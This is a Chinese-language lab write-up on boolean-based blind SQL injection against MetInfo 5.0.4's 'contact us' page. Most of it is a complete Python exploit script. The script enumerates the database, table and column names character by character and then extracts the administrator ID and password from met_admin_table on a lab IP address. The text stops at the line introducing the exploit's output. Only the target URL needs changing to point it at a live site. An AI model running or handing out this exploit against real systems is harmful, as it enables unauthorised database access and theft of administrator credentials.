布尔盲注
布尔盲注一般适用于页面没有回显字段,但页面回显有True 或者 false两种情况,利用and,or等关键字来构造SQL语句,再利用页面返回true或false来判断是否执行成功,从而达到注入的目的来获取信息。
漏洞复现
漏洞注入点在‘联系我们’页面的url上
利用and 1=1 和 1=2 判断出布尔盲注
利用length函数判断出数据库长度为11
exp编写
# metinfo_504_sqli.py
import requests
import string
url = "http://192.168.66.29/metinfo_504/about/show.php?lang=cn&id=22"
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"
}
flag = "13300000000" #利用页面上的电话号码来判断页面返回为True
str =string.printable.strip()
# 爆数据库长度
print("--------------------------------------Attacking.....")
for i in range(20) :
payload = f" and length(database())={i} --+"
url_all = url + payload
# print(url_all)
res = requests.get(url = url_all , headers=headers)
if flag in res.text :
break
print(f"The database length is: {i}")
# 爆库
print("--------------------------------------Attacking.....")
dbs1 = ""
for i in range(1,12) :
for c in str :
payloads = f" and ascii(substr((select database()),{i},1))={ord(c)} --+"
url_all = url + payloads
# print(url_all)
res = requests.get(url=url_all,headers=headers)
if flag in res.text :
dbs1 += c
break
print(f"The db_name is: {dbs1}")
# 爆表长度
print("--------------------------------------Attacking.....")
for i in range(1,500) :
payload = f""" and length((select group_concat(table_name) from information_schema.tables
where table_schema=database()))={i} --+"""
url_all = url + payload
# print(url_all)
res = requests.get(url = url_all , headers=headers)
if flag in res.text :
break
print(f"The table length is: {i}")
# 爆表
print("--------------------------------------Attacking.....")
dbs2 = ""
for i in range(1,333) :
for c in str :
payloads = f""" and ascii(substr((select group_concat(table_name) from information_schema.tables
where table_schema=database()),{i},1))={ord(c)} --+"""
url_all = url + payloads
# print(url_all)
res = requests.get(url=url_all,headers=headers)
if flag in res.text :
dbs2 += c
break
print(f"The tab_name is: {dbs2}")
# 爆列长度
print("--------------------------------------Attacking.....")
for i in range(1,500) :
payload = f""" and length((select group_concat(column_name) from information_schema.columns
where table_schema=database() and table_name=0x6d65745f61646d696e5f7461626c65))={i} --+"""
url_all = url + payload
# print(url_all)
res = requests.get(url = url_all , headers=headers)
if flag in res.text :
break
print(f"The column length is: {i}")
# 爆列
print("--------------------------------------Attacking.....")
dbs3 = ""
for i in range(1,365) :
for c in str :
payloads = f""" and ascii(substr((select group_concat(column_name) from information_schema.columns
where table_schema=database() and table_name=0x6d65745f61646d696e5f7461626c65),{i},1))={ord(c)} --+"""
url_all = url + payloads
# print(url_all)
res = requests.get(url=url_all,headers=headers)
if flag in res.text :
dbs3 += c
break
print(f"The column_name is: {dbs3}")
# 爆数据长度
print("--------------------------------------Attacking.....")
for i in range(1,500) :
payload = f" and length((select concat(admin_id,0x3a,admin_pass) from met_admin_table))={i} --+"
url_all = url + payload
# print(url_all)
res = requests.get(url = url_all , headers=headers)
if flag in res.text :
break
print(f"The userpass length is: {i}")
# 爆数据
dbs4 = ""
print("--------------------------------------Attacking.....")
for i in range(1,39) :
for c in str :
payloads = f" and ascii(substr((select concat(admin_id,0x3a,admin_pass) from met_admin_table),{i},1))={ord(c)} --+"
url_all = url + payloads
res = requests.get(url= url_all,headers=headers)
if flag in res.text:
dbs4 += c
break
print(f"The userpass is: {dbs4}")
exp效果如下